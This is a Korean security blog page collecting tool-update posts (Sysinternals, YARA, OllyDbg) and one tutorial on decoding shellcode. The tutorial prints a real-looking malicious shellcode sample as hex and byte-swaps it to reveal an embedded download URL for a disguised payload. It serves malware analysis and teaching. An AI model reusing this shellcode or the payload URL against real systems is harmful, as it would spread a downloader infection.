'Tools'에 해당되는 글 112건




Sysinternals Tool 중 몇가지가 업데이트 되었네요! 

링크 연결 하오니~ 필요하신 분들은 다운로드 받으세요!!

이번 업데이트에서는 기존의 AccessChk v6.0, Autoruns v13.4, Process Monitor v3.2, VMMap v3.2가 업데이트가 되었습니다.
특히 많이 사용되는 Autoruns 나 Process Monitor도 업데이트 되었으니 최신으로 사용하세요.

- 업데이트 목록(클릭하시면 새창으로 이동합니다)

■ AccessChk v6.0

This update to AccessChk, a command-line utility that shows effective and actual permissions for registry keys, files, services, kernel objects, and more, can now show the permissions and security descriptors assigned to event logs, and incorporates owner-rights accesses in its permissions evaluations.


■ Autoruns v13.4

Autoruns, the most comprehensive utility available for showing what executables, DLLs, and drivers are configured to automatically start and load, now reports Office addins, adds several additional autostart locations, and no longer hides hosting executables like cmd.exe, powershell.exe and others when Windows and Microsoft filters are in effect.


■ Process Monitor v3.2

Process Monitor, a real-time system monitoring utility that captures registry, file system, process and thread, CPU, DLL and network activity, adds an option to show all file system values in hexadecimal, adds additional error code and file system control strings, and fixes a bug that prevented boot capture on Windows 10.


■ VMMap v3.2

This release of VMMap, a powerful tool for analyzing the virtual and physical memory usage of a process, fixes a bug that prevented it from working with the 2 TB reserved memory region introduced to support Control Flow Guard (CFG).


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.





ysinternals Tool 중 몇가지가 업데이트 되었네요! 

링크 연결 하오니~ 필요하신 분들은 다운로드 받으세요!!

이번 업데이트에서는 기존의 LiveKd v5.4, Autoruns v13.2, Sigcheck v2.2, Process Explorer v16.05가 업데이트가 되었습니다.
특히 많이 사용되는 Autoruns 나 Process Explorer로 업데이트 되었으니 최신으로 사용하세요.

- 업데이트 목록(클릭하시면 새창으로 이동합니다)

■ LiveKd v5.4

This update to Livekd, a tool that enables live kernel debugging for Windows systems and Hyper-V guest Windows virtual machines, now includes ‘live dump’ support for generating fast-snapshot crash-consistent kernel dump files using support introduced in Windows 8.1 and Windows Server 2012 R2.


■ Autoruns v13.2

In addition to bug fixes to CSV and XML output, Autorunsc introduces import-hash reporting, and Autoruns now excludes command-line and other host processes from the Microsoft and Windows filters.


■ Sigcheck v2.2

This release of Sigcheck, a command-line tool that reports file version, code signing, and hash information, introduces import-hash reporting and support for files larger than 4 GB.


■ Process Explorer v16.05

Process Explorer now includes a Protection column that shows process protection status.


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




Sysinternals Tool 중 몇가지가 업데이트 되었네요! 

링크 연결 하오니~ 필요하신 분들은 다운로드 받으세요!!

이번 업데이트에서는 기존의 Sysmon v2.0, Accesschk v5.21, RU v1.1 가 업데이트가 되었습니다.

- 업데이트 목록(클릭하시면 새창으로 이동합니다)

■ Sysmon v2.0

This major update to Sysmon, a service that records process activity to the Windows event log for use by incident detection and forensic analysis, includes driver load and image load events with signature information, configurable hashing algorithm reporting, flexible filters for including and excluding events, and support for supplying configuration via a configuration file instead of the command line.


■ AccessChk v5.21

This update to Accesschk, a command-line utility that shows effective and actual permissions for registry keys, files, services, kernel objects, and more, adds an option to report permissions as SDDL strings, adds new process permission types, and fixes a bug with showing process security descriptors.


■ RU v1.1

RU (Registry Usage), a command-line tool that shows registry usage by key, now supports loading hive files (with the side-effect of compressing them when done) and reports last write timestamp in CSV output.


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




Sysinternals Tool 중 몇가지가 업데이트 되었네요! 

링크 연결 하오니~ 필요하신 분들은 다운로드 받으세요!!

이번 업데이트에서는 기존의 Handle v4.0. Procdump v7.01, Procexp v16.04, Regjump v1.02, Autoruns v12.03 가 업데이트가 
되었습니다.

분석 때 많이 사용되는 Process Explorer 는 v16.04 버전으로 오면서, 바이러스토탈(VirusTotal)에 업로드 하는 버그를 
수정했다고 하네요. 

이 부분은 저도 마음에 들지 않는 부분이였는데, 잘 수정되었네요^^


- 업데이트 목록(클릭하시면 새창으로 이동합니다)

■ Handle v4 : Handle is a command-line utility that can show which processes have a handle to a file or other resource open, or show all open handles. Version 4 now works with standard-user rights, allowing standard users to identify the handles open by their processes.


■ ProcDump v7.01 : This release fixes several bugs, including one that affects the UI hang trigger, one that causes misnamed dump files for reflected dumps, and another that would cause .NET applications Procdump monitors for first-chance exceptions to terminate with Procdump.

 

■ Process Explorer v16.04 : This update fixes a bug in Virus Total file submission that could cause a crash, and now shows Windows Store package names on the Image page of the process properties dialog.

 

■ RegJump v1.02 : Regjump, a utility that opens Regedit to the registry key specified as a command-line argument, now works on 64-bit Windows.

 

■ Autoruns v12.03 : This update to Autoruns adds the registered HTML file extension, fixes a bug that could cause disabling of specific entry types to fail with a "path not found" error, and addresses another that could prevent the Jump-to-image function from opening the selected image on 64-bit Windows.


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




Sysinternals Tool 중 몇가지가 업데이트 되었네요! 

링크 연결 하오니~ 필요하신 분들은 다운로드 받으세요!!

이번 업데이트에서는 기존의 Autoruns v12.02, Coreinfo v3.31, Sysmon v1.01, Whois v1.12 가 업데이트가 되었습니다.

- 업데이트 목록(클릭하시면 새창으로 이동합니다)

■ Autoruns v12.02 : This fixes a bug that could cause Autoruns to crash on startup, updates the image path parsing for Installed Components to remove false positive file-not-found entries, and correctly reports image entry timestamps in local time instead of UTC.

 

■ Coreinfo v3.31 : This update fixes a bug that could prevent the Coreinfo driver from loading.

 

■ Sysmon v1.01 : This fixes the manifest registration so that Sysmon event logs can be interpreted without installing Sysmon, and now includes unique UDP connections within 15-minute intervals.

 

■ Whois v1.12 : This release fixes the verbose output to not show the final record twice.



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




Sysinternals Tool 중 몇가지가 업데이트 되었네요! 

링크 연결 하오니~ 필요하신 분들은 다운로드 받으세요!!

이번 업데이트에서는 시스템 모니터링을 할 수 있는 Sysmon v1.0 이 새롭게 선보였으며,
기존의 Autoruns v12.01, Coreinfo v3.3, Procexp v16.03 가 업데이트가 되었습니다.

오랫만에 Procesxp 가 업데이트가 되었네요.
뭐 별로 바뀐건 없어보입니다만 ㅎㅎㅎ

새로운 툴인 Sysmon은 기존의 시스템관리에서 이벤트들을 확인 할 수 있는 툴로 보이네요.

- 업데이트 목록(클릭하시면 새창으로 이동합니다)

Sysmon v1.0 : We’re excited to announce Sysmon, a new Sysinternals utility that monitors and reports key system activity via the Windows event log, including detailed information about process creation, network connections and file creation timestamp changes. With Sysmon installed on your systems, you can collect and analyze these events to identify the presence of attackers, and correlate events across your network to track them as they traverse your network.


Autoruns v12.01 : This update to Autoruns, a utility that comes in Windows application and command-line forms, has numerous bug fixes, adds a profile attribute/column to CSV and XML output, and interprets the CodeBase value for COM object registrations.


Coreinfo v3.3 : Coreinfo is a command-line utility that reports comprehensive information about a system’s processors, including their cache sizes and topology, memory latency, and processor features, now reports virtual memory address width as well as support for many additional instructions, including PT, SHA, MPX, CFLUSHOPT, and AVX variants.


Procexp v16.03 : This release of Process Explorer, a process viewing and control utility, fixes several bugs, including one where moving the mouse over the information graphs could cause it to crash and another that could cause a crash when checking Virus Total results.



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




분석을 하다보면 HEX 값을 ASCII로 변환 해야 하는 경우가 다수 있다.

보통 ShellCode를 살펴보다 보면 이런 값들을 많이 보게 되는데 한가지 예시를 들어보자.


0x68FFFFFE, 0x3A707474 -> 이 값을 ASCII로 변환해 보면 "h  ?ptt" 이러한 값이 보여진다.

유추 해 보자면 이 값은 "http:" 를 나타나는 HEX 값일 것이다.


그럼 리틀엔디언(Little-Endian) 방식으로 값을 변환 해서 아래와 같은 값으로 바꾸면 된다.

(※ 변환값을 알기 쉽도록 2바이트마다 (숫자)로 표기함)


0x68(1)FF(2)FF(3)FE(4), 0x3A(1)70(2)74(3)74(4) : (원본)

                             

0xFE(4)FF(3)FF(2)68(1), 0x74(4)74(3)70(2)3A(1) : (변환)


위의 예시에서 말하듯이 어떠한 특정 데이터를 리틀엔디언 형식으로 바꾸는건 어렵지 않다.

하지만 그 데이터가 방대하다면??? 


사람의 손으로 한다는건 정말 말도 안된다!! 


그래서 디코딩 툴로 유명한 kahusecurity 의 Converter Tool을 이용하여 변환하는 방법을 알아보자!!

※ 준비물

- kahusecurity Converter Tool : http://www.kahusecurity.com/tools


- malzilla_1.2.0 : http://malzilla.sourceforge.net


- Converter Data (※ Data는 3.20 유사 샘플에서 인용하였음)

0x50EC8360, 0xE34B8B68, 0xED49685F, 0x29687E0F, 0x6857E844, 0x5B8ACA33, 0x46C61B68, 0xFE726879, 0xFB6816B3, 0x680FFD97, 0xE80A791F, 0x0117A568, 0x4E8E687C, 0xCC8BEC0E, 0x00008BE9, 0x33FC5600, 0x528B64D2, 0x0C528B30, 0x8B14528B, 0xC0332872, 0x000018B8, 0x33595000, 0xACC033FF, 0x027C613C, 0xCFC1202C, 0xE2F8030D, 0x5BFF81F0, 0x8B6A4ABC, 0x128B105A, 0xC38BD575, 0x8B60C35E, 0x3C558BEA, 0x7815448B, 0xD08BC503, 0x8B18488B, 0xDD032058, 0x8B4934E3, 0xF5038B34, 0xC033FF33, 0xC084ACFC, 0xCFC10774, 0xEBF8030D, 0x247C3BF4, 0x8BE17528, 0xDD03245A, 0x4B0C8B66, 0x031C5A8B, 0x8B048BDD, 0x4489C503, 0xC3611C24, 0x50AD39EB, 0xFFA8E852, 0x0789FFFF, 0x8308C483, 0xF13B04C7, 0x5EC3EC75, 0xF0B0C033, 0xEC8BE02B, 0x51407589, 0xFFFF4CE8, 0xD08B59FF, 0x05EB02EB, 0xFFFFF9E8, 0x458958FF, 0xE905EB2C, 0x00000081, 0x4EFEF18B, 0x047D8D06, 0xC183CE8B, 0xFFB0E81C, 0xC183FFFF, 0x6E01B80C, 0xF8C17465, 0x77685008, 0x8B696E69, 0x535251DC, 0x5A0455FF, 0xE8D08B59, 0xFFFFFF8E, 0x5050C033, 0xFF505050, 0x45892055, 0x20458D34, 0x0040B850, 0xB8500000, 0x00004000, 0x2C458B50, 0x0010002D, 0x55FF5000, 0xB8C03318, 0x00008000, 0x50C03350, 0x5D8B5050, 0x75FF5340, 0x2455FF34, 0x840FC085, 0x000000D2, 0xEB384589, 0x8D35EB02, 0x33567F75, 0x5030B0C0, 0x8B1C55FF, 0xC7C033D8, 0x61781E04, 0x44C76975, 0x636F041E, 0x44C76E6F, 0x2E66081E, 0x44C67865, 0x88650C1E, 0x890D1E44, 0x02EB3075, 0xB05067EB, 0x02B05002, 0x50C03250, 0xC140B050, 0x565018E0, 0x830855FF, 0x7A74FFF8, 0x333C4589, 0x0CB866C0, 0x8BE02B01, 0x045E8DF4, 0x04B86653, 0x468D5001, 0x75FF5008, 0x2855FF38, 0x8504468B, 0x331674C0, 0x468D50C0, 0x76FF5004, 0x08468D04, 0x3C75FF50, 0xEB0C55FF, 0x3C75FFD0, 0x331055FF, 0x0CB866C0, 0xEBE00301, 0x3333EB02, 0x2B54B1C9, 0x33FC8BE1, 0x8BAAF3C0, 0x4407C6FC, 0x5644778D, 0x50505057, 0xFF505050, 0xFF503075, 0xC4811455, 0x000001C4, 0xC481C361, 0x00000170, 0x7CE8C361, 0x68FFFFFE, 0x3A707474, 0x77772F2F, 0x64732E77, 0x69616667, 0x632E6874, 0x662F6D6F, 0x73656C69, 0x766E652F, 0x616D692F, 0x6A2F6567, 0x662F6770, 0x74737269, 0x6669672E, 0x00000000



0. Converter Data 변환

우선 Data를 보면, 0x00000000 형식으로 되어있다.

이 데이터를 우리는 변환이 가능하도록 "0x" , "," 문구를 모두 없애는 작업이 우선이다.

(문구를 없앨때에는 Editor 프로그램 아무거나 써도 된다.)

50EC8360E34B8B68ED49685F29687E0F6857E8445B8ACA3346C61B68FE726879FB6816B3680FFD97E80A791F0117A5684E8E687CCC8BEC0E00008BE933FC5600528B64D20C528B308B14528BC0332872000018B833595000ACC033FF027C613CCFC1202CE2F8030D5BFF81F08B6A4ABC128B105AC38BD5758B60C35E3C558BEA7815448BD08BC5038B18488BDD0320588B4934E3F5038B34C033FF33C084ACFCCFC10774EBF8030D247C3BF48BE17528DD03245A4B0C8B66031C5A8B8B048BDD4489C503C3611C2450AD39EBFFA8E8520789FFFF8308C483F13B04C75EC3EC75F0B0C033EC8BE02B51407589FFFF4CE8D08B59FF05EB02EBFFFFF9E8458958FFE905EB2C000000814EFEF18B047D8D06C183CE8BFFB0E81CC183FFFF6E01B80CF8C17465776850088B696E69535251DC5A0455FFE8D08B59FFFFFF8E5050C033FF5050504589205520458D340040B850B8500000000040002C458B500010002D55FF5000B8C033180000800050C033505D8B505075FF53402455FF34840FC085000000D2EB3845898D35EB0233567F755030B0C08B1C55FFC7C033D861781E0444C76975636F041E44C76E6F2E66081E44C6786588650C1E890D1E4402EB3075B05067EB02B0500250C03250C140B050565018E0830855FF7A74FFF8333C45890CB866C08BE02B01045E8DF404B86653468D500175FF50082855FF388504468B331674C0468D50C076FF500408468D043C75FF50EB0C55FF3C75FFD0331055FF0CB866C0EBE003013333EB022B54B1C933FC8BE18BAAF3C04407C6FC5644778D50505057FF505050FF503075C4811455000001C4C481C361000001707CE8C36168FFFFFE3A70747477772F2F64732E7769616667632E6874662F6D6F73656C69766E652F616D692F6A2F6567662F6770747372696669672E00000000



1. USC2 to Hex 된 데이터

Converter Tool 을 이용하여 Converter Data 를 input에 입력 후 USC2 to Hex 클릭 한다.

 


그럼 아래와 같은 Converter Data 를 얻을 수 있다.

EC5060834BE3688B49ED5F6868290F7E576844E88A5B33CAC646681B72FE796868FBB3160F6897FD0AE81F79170168A58E4E7C688BCC0EEC0000E98BFC3300568B52D264520C308B148B8B5233C072280000B81859330050C0ACFF337C023C61C1CF2C20F8E20D03FF5BF0816A8BBC4A8B125A108BC375D5608B5EC3553CEA8B15788B448BD003C5188B8B4803DD5820498BE33403F5348B33C033FF84C0FCACC1CF7407F8EB0D037C24F43BE18B287503DD5A240C4B668B1C038B5A048BDD8B894403C561C3241CAD50EB39A8FF52E88907FFFF088383C43BF1C704C35E75ECB0F033C08BEC2BE040518975FFFFE84C8BD0FF59EB05EB02FFFFE8F98945FF5805E92CEB00008100FE4E8BF17D04068D83C18BCEB0FF1CE883C1FFFF016E0CB8C1F8657468770850698B696E5253DC51045AFF55D0E8598BFFFF8EFF505033C050FF5050894555204520348D400050B850B8000000000040452C508B10002D00FF550050C0B8183300000080C05050338B5D5050FF754053552434FF0F8485C00000D20038EB8945358D02EB5633757F3050C0B01C8BFF55C0C7D8337861041EC74475696F631E04C7446F6E662E1E08C644657865881E0C0D89441EEB02753050B0EB67B0020250C050503240C150B05056E0180883FF55747AF8FF3C338945B80CC066E08B012B5E04F48DB80453668D460150FF750850552838FF04858B461633C0748D46C050FF7604504608048D753C50FF0CEBFF55753CD0FF1033FF55B80CC066E0EB0103333302EB542BC9B1FC33E18BAA8BC0F30744FCC644568D775050575050FF505050FF753081C455140000C40181C461C300007001E87C61C3FF68FEFF703A747477772F2F7364772E616967662E6374682F666F6D6573696C6E762F656D612F692F6A67652F6670677374697269662E6700000000



2. Swap (6 Chars 2 Positons)

1번에 나온 Data의 순서를 Swap 버튼으로 바꿀 수 있다.

6 Chars 2 Positons 는 6개의 문자열을 2개의 위치씩 변환시키라는 뜻이다.


그럼 아래와 같은 Converter Data 를 얻을 수 있다.

6050EC8368E34B8B5FED49680F29687E446857E8335B8ACA6846C61B79FE7268B3FB681697680FFD1FE80A79680117A57C4E8E680ECC8BECE900008B0033FC56D2528B64300C528B8B8B145272C03328B800001800335950FFACC0333C027C612CCFC1200DE2F803F05BFF81BC8B6A4A5A128B1075C38BD55E8B60C3EA3C558B8B78154403D08BC58B8B184858DD0320E38B493434F5038B33C033FFFCC084AC74CFC1070DEBF803F4247C3B288BE1755ADD0324664B0C8B8B031C5ADD8B048B034489C524C3611CEB50AD3952FFA8E8FF0789FF838308C4C7F13B04755EC3EC33F0B0C02BEC8BE089514075E8FFFF4CFFD08B59EB05EB02E8FFFFF9FF4589582CE905EB810000008B4EFEF106047D8D8BC183CE1CFFB0E8FFC183FF0C6E01B865F8C17408776850698B696EDC535251FF5A045559E8D08B8EFFFFFF335050C050FF5050554589203420458D500040B800B8500000000040502C458B2D0010000055FF5018B8C033000000805050C033505D8B504075FF53342455FF85840FC0D200000089EB3845028D35EB7533567FC05030B0FF8B1C55D8C7C0330461781E7544C7691E636F046F44C76E1E2E66086544C6781E88650C44890D1E7502EB30EBB050670202B0505050C03250C140B0E0565018FF830855F87A74FF89333C45C00CB866018BE02BF4045E8D5304B86601468D500875FF50382855FF8B850446C0331674C0468D500476FF500408468D503C75FFFFEB0C55D03C75FFFF331055C00CB86601EBE003023333EBC92B54B1E133FC8BC08BAAF3FC4407C68D5644775750505050FF505075FF503055C48114C400000161C481C370000001617CE8C3FE68FFFF743A70742F77772F7764732E6769616674632E686F662F6D6973656C2F766E652F616D69676A2F6570662F67697473722E66696700000000



3. 2번 데이터를 다시 USC2 to Hex 

2번에서 나온 Data를 다시 input 창에 복사 한 후 USC2 to Hex 를 클릭한다.

 


그럼 아래와 같은 Converter Data 를 얻을 수 있다.

506083ECE3688B4BED5F6849290F7E686844E8575B33CA8A46681BC6FE796872FBB316686897FD0FE81F790A0168A5174E7C688ECC0EEC8B00E98B00330056FC52D2648B0C308B528B8B5214C072283300B8180033005059ACFF33C0023C617CCF2C20C1E20D03F85BF081FF8BBC4A6A125A108BC375D58B8B5EC3603CEA8B55788B4415D003C58B8B8B4818DD5820038BE33449F5348B03C033FF33C0FCAC84CF7407C1EB0D03F824F43B7C8B2875E1DD5A24034B668B0C038B5A1C8BDD8B044403C589C3241C6150EB39ADFF52E8A807FFFF898383C408F1C7043B5E75ECC3F033C0B0EC2BE08B51897540FFE84CFFD0FF598B05EB02EBFFE8F9FF45FF5889E92CEB05008100004E8BF1FE04068D7DC18BCE83FF1CE8B0C1FFFF836E0CB801F86574C1770850688B696E6953DC51525AFF5504E8598BD0FF8EFFFF5033C050FF5050504555208920348D450050B840B8000050000040002C508B45002D0010550050FFB81833C000008000505033C05D50508B754053FF2434FF558485C00F00D20000EB8945388D02EB3533757F5650C0B0308BFF551CC7D833C061041E78447569C7631E046F446F6EC72E1E0866446578C6881E0C6589441E0D027530EBB0EB6750020250B0505032C0C150B04056E0185083FF55087AF8FF743389453C0CC066B88B012BE004F48D5E045366B84601508D750850FF2838FF55858B460433C0741646C0508D760450FF08048D463C50FF75EBFF550C3CD0FF7533FF55100CC066B8EB0103E03302EB332BC9B15433E18BFC8BC0F3AA44FCC607568D774450575050FF505050FF753050C455148100C40100C461C381007001007C61C3E868FEFFFF3A747470772F2F7764772E73696766616374682E666F6D2F73696C65762F656E612F696D6A67652F6670672F74697273662E676900000000



4. Swap (6 Chars 2 Positons)

3번에 나온 Data의 순서를 Swap 버튼으로 다시 바꾼다.


그럼 아래와 같은 Converter Data 를 얻을 수 있다.

836050EC8B68E34B685FED497E0F2968E8446857CA335B8A1B6846C66879FE7216B3FB68FD97680F791FE80AA5680117687C4E8EEC0ECC8B8BE90000560033FC64D2528B8B300C52528B8B142872C03318B800005000335933FFACC0613C027C202CCFC1030DE2F881F05BFF4ABC8B6A105A128BD575C38BC35E8B608BEA3C55448B7815C503D08B488B8B182058DD0334E38B498B34F503FF33C033ACFCC0840774CFC1030DEBF83BF4247C75288BE1245ADD038B664B0C5A8B031C8BDD8B04C50344891C24C36139EB50ADE852FFA8FFFF0789C483830804C7F13BEC755EC3C033F0B0E02BEC8B758951404CE8FFFF59FFD08B02EB05EBF9E8FFFF58FF4589EB2CE90500810000F18B4EFE8D06047DCE8BC183E81CFFB0FFFFC183B80C6E017465F8C1500877686E698B6951DC535255FF5A048B59E8D0FF8EFFFFC03350505050FF50205545898D342045B85000400000B850400000008B502C45002D0010500055FF3318B8C080000000335050C050505D8B534075FFFF342455C085840F00D200004589EB38EB028D357F753356B0C0503055FF8B1C33D8C7C01E046178697544C7041E636F6E6F44C7081E2E66786544C60C1E88651E44890D307502EB67EBB050500202B0325050C0B050C14018E0565055FF8308FFF87A744589333C66C00CB82B018BE08DF4045E665304B85001468D500875FFFF382855468B850474C0331650C0468D500476FF8D040846FF503C7555FFEB0CFFD03C7555FF331066C00CB80301EBE0EB023333B1C92B548BE133FCF3C08BAAC6FC4407778D5644505750505050FF503075FF501455C48101C40000C361C48101700000C3617CE8FFFE68FF74743A702F2F77772E776473666769616874632E6D6F662F6C697365652F766E692F616D65676A2F6770662F72697473672E666900000000



5. 4번 데이터를 다시 USC2 to Hex 

4번에서 나온 Data를 다시 input 창에 복사 한 후 USC2 to Hex 를 클릭한다.

 


그럼 아래와 같이 최종적으로 Converter Data 를 얻을 수 있다.

6083EC50688B4BE35F6849ED0F7E682944E8576833CA8A5B681BC646796872FEB31668FB97FD0F681F790AE868A517017C688E4E0EEC8BCCE98B00000056FC33D2648B52308B520C8B52148B722833C0B818000000505933FF33C0AC3C617C022C20C1CF0D03F8E2F081FF5BBC4A6A8B5A108B1275D58BC35EC3608BEA8B553C8B44157803C58BD08B48188B582003DDE334498B348B03F533FF33C0FCAC84C07407C1CF0D03F8EBF43B7C242875E18B5A2403DD668B0C4B8B5A1C03DD8B048B03C58944241C61C3EB39AD5052E8A8FFFFFF890783C40883C7043BF175ECC35E33C0B0F02BE08BEC89754051E84CFFFFFF598BD0EB02EB05E8F9FFFFFF5889452CEB05E9810000008BF1FE4E068D7D048BCE83C11CE8B0FFFFFF83C10CB8016E6574C1F808506877696E698BDC515253FF55045A598BD0E88EFFFFFF33C05050505050FF55208945348D452050B84000000050B800400000508B452C2D0010000050FF551833C0B8008000005033C05050508B5D4053FF7534FF552485C00F84D2000000894538EB02EB358D757F5633C0B03050FF551C8BD833C0C7041E78617569C7441E046F636F6EC7441E08662E6578C6441E0C6588441E0D897530EB02EB6750B00250B0025032C05050B040C1E0185056FF550883F8FF747A89453C33C066B80C012BE08BF48D5E045366B80401508D460850FF7538FF55288B460485C0741633C0508D460450FF76048D460850FF753CFF550CEBD0FF753CFF551033C066B80C0103E0EB02EB3333C9B1542BE18BFC33C0F3AA8BFCC607448D77445657505050505050FF753050FF551481C4C401000061C381C47001000061C3E87CFEFFFF687474703A2F2F7777772E73646766616974682E636F6D2F66696C65732F656E762F696D6167652F6A70672F66697273742E67696600000000






최종적으로 바뀌었다고는 하나 뭐가 틀린지 모르겠다는 분들을 위해 변환전과 변환후의 ASCII 값을 살펴보자.

(보통 HEX값을 ASCII로 볼 때에는 Malzilla 기능 중 Hew View Tab을 많이 이용한다)


■ 순서를 바꾸기 전에 Converter Data의 ASCII 값이다.

뭔가 의심스러운 URL 문자열이 보인다.


■ 순서를 바꾼 후 Converter Data의 ASCII 값이다.

정확히 다운로드 할 URL이 눈에 보인다.


인터넷을 찾아보니, 이렇게 임의의 데이터를 리틀엔디언(Little-Endian)으로 바꿔주는 툴이 존재하지 않았다.

물론 내가 못 찾은거 일 수도 있다. ㅡ.ㅡ;;

(아는 사람은 좀 알려주시길 ㅋㅋㅋㅋㅋㅋㅋㅋㅋ)


그래도 이렇게 5번의 변환과정을 통해 바꾸는건 정말 귀찮은거 같다.

가능하면, 개발능력을 높여서 직접 툴을 만드는것을 추천한다!!


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




Sysinternals Tool 중 몇가지가 업데이트 되었네요! 

링크 연결 하오니~ 필요하신 분들은 다운로드 받으세요!!

이번 업데이트에서는 AccessChk v5.2; PsExec v2.11; Sigcheck v2.1; VMMap v3.12 가 업데이트가 되었습니다.

- 업데이트 목록(클릭하시면 새창으로 이동합니다)
AccessChk v5.2 : This release of AccessChk, a security command-line utility that reports the effective access and permissions of files, registry keys, processes, and more, adds support for file and printer shares. In addition, it adds filtering options for viewing accesses related to specified accounts and now includes the System Access Control List (SACL) when it dumps security descriptors.

PsExec v2.11 : This release to PsExec, a command-line remote execution utility, fixes a bug in the implementation of the -s (execute as local system) option on Windows Server 2003.

Sigcheck v2.1 : This update to Sigcheck, a command-line utility that shows file version and digital signature information, now reports a file’s entropy (average bits/byte required to encode its data), can dump information about catalog files including the hashes they store, and can list the certificates installed in the per-user and machine certificate store.

VMMap v3.12 : This release of VMMap, a tool for analyzing process virtual and physical memory usage, fixes a bug affecting queries of files stored on file shares, fixes a bug in copy-to-clipboard of 64-bit addresses, now reports an error when attempting to open stacks on loaded traces, and fixes a bug in the reserved memory working set calculation.



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.



Sysinternals Tool 중 몇가지가 업데이트 되었네요! 

링크 연결 하오니~ 필요하신 분들은 다운로드 받으세요!!

이번 업데이트에서는 분석 시 많이 사용하는 Process Explorer v16.02, Process Monitor v.3.1 가 업데이트가 되었습니다.
특히, 
Process Explorer 는 v16으로 버전업하면서 바이러스토탈(VirusTotal)과 연동이 가능하다.

이 관련 된 내용은 아래의 블로그에 가면 좀 더 자세히 알 수 있다.
 

- 업데이트 목록(클릭하시면 새창으로 이동합니다)

Process Explorer v16.02 : This minor update adds a refresh button to the thread’s stack dialog and ensures that the Virus Total terms of agreement dialog box remains above the main Process Explorer window.
Process Monitor v.3.1 : This release adds registry create file disposition (create vs open) and a new switch, /saveapplyfilter, which has Process Monitor apply the current filter to the output file as it saves it.
PSExec v2.1 : This update to PsExec, a command-line utility that enables you to execute programs on remote systems without preinstalling an agent, encrypts all communication between local and remote systems, including the transmission of command information such as the user name and password under which the remote program executes.
Sigcheck v2.03 : This version corrects a bug that caused the output of the –u switch to include signed files, and fixes several other minor bugs.

블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


디텍트툴로 많이 알려진 야라(YARA)가 2.0버전으로 업데이트 되었네요.
이번 2.0 버전 업데이트에서는 1.x 버전과는 다른 엄청난 속도를 자랑한다고 합니다.

특히, 1.x 보다 140배 빠르고, 멀티 스레딩을 지원하기 때문에 검사속도를 증가 시켰다고 하네요.
(개인적으로 테스트 해보니, 정말 엄청난 속도를 자랑하고 느린 Rule에 대해서 경고도 보여주는군요!! 굿!!)

야라(YARA)는 현재 많은 곳에서 사용하고 있으나, 가장 유명한 곳은 아래와 같은 곳입니다.
- VirusTotal Intelligence (https://www.virustotal.com/intelligence)
- jsunpack-n (http://jsunpack.jeek.org)
- We Watch Your Website (http://www.wewatchyourwebsite.com)



아래의 링크에서 야라 홈페이지 및 YARA 2.0 버전을 다운로드 받을 수 있습니다.
- YARA 홈페이지 : http://plusvic.github.io/yara/
- YARA 2.0 프로젝트 : https://github.com/plusvic/yara/releases/tag/v2.0.0


이번 2.0 업데이트에서는 다음과 같이 수정되었습니다.

- 2.0.0 (26/12/2013)
 

Faster matching algorithm


Command-line scanner is now multi-threaded


Compiled rules can be saved to and loaded from a file


Added support for unbounded jumps


New libyara API


※ Yara 2.0 vs 1.x Speed Test 결과 동영상이 추가됨
 



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


Sysinternals Tool 중 몇가지가 업데이트 되었네요! 
링크 연결 하오니~ 필요하신 분들은 다운로드 받으세요!!

- 업데이트 목록(클릭하시면 새창으로 이동합니다)

PsExec v2.0 : PsExec, a popular utility for executing processes on remote systems, introduces a new option, -r, that specifies the name PsExec assigns to its remote service. This can improve performance when multiple users are interacting concurrently with a system, since each will have a dedicated PsExec service.

RAMMap v1.3 : RAMMap, a graphical utility that provides a comprehensive breakdown of physical memory usage by usage type and process, is updated to work on Windows 8.1.

Sigcheck v2.0 : This major update to Sigcheck, a command-line file version and digital signature verification utility, adds integration with the VirusTotal antivirus scanner aggregation service. Sigcheck can now check the status of a file against over 40 antivirus engines and launch the associated online VirusTotal report, and even upload files for scanning that have not already been scanned by VirusTotal. This release also reports the machine type of executable images, whether 16-, 32-, or 64-bit.

블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


올리디버거(OllyDBG)는 리버싱의 기본이며, 리서버의 손과 같은 프로그램이다.
그동안 1.x 버전대만 계속 사용을 해왔는데, 이제 어느정도 올리디버거도 2.x버전이 베타테스트는 끝났나고 볼 수 있으니
모두 2.x 버전으로 물갈이 할 때가 온 것 같다 ㅎㅎ

위키백과에 보면 올리디버거를 아래와 같이 설명하고 있다.

OllyDbg는 2진 파일 분석기이자 x86 디버거 가운데 하나로, 만든이는 Oleh Yuschuk이다.
레지스터를 복사함과 더불어 프로세스, API 호출, 스위치, 테이블, 상수, 문자열 등을 알아내며 오브젝트 파일과
라이브러리로부터 루틴을 찾아낸다.

최근 2.0 버전이 공개되었으며 64비트 환경과 새로운 플러그인은 미리보기 버전에서 지원 중이다.


윈도용이며 소스 코드는 공개되어 있지 않다. 무료로 사용할 수 있지만 영구히 사용하거나 영리를 목적으로 사용하기를 원하는 경우 사용자 등록을 해야 된다. (사용자 등록 또한 무료이다)



※ 올리디버거 2.01 버전은 아래에서 다운로드 받을 수 있다.
1. OllyDbg : http://www.ollydbg.de/odbg201.zip
2. Empty language file : http://www.ollydbg.de/language.zip
3. Chicken language file : http://www.ollydbg.de/chicken.zip
4. Disassembler 2.01 : http://www.ollydbg.de/Disasm201.zip



올리디버거 2.01 버전에 대한 자세한 사항은 홈페이지에서 확인 할 수 있다.
- 올리디버거 사이트 : http://www.ollydbg.de

September 27, 2013 - version 2.01. OllyDbg, empty language file, chicken language file, Disassembler 2.01 (GPL v3, preliminary version without documentation)


New version with many new features, among them:

■ Help on 77 pages. Please read it first - most of new features are described there

■ Multilanguage GUI (experimental, as yet no translation files - please do it by yourself)

■ Support for AVS instuctions (as yet no AVS2 and high 16 bytes of YMM registers are not displayed)

■ Call stack window (similar to the version 1.10)

■ Handles window (similar to the version 1.10)

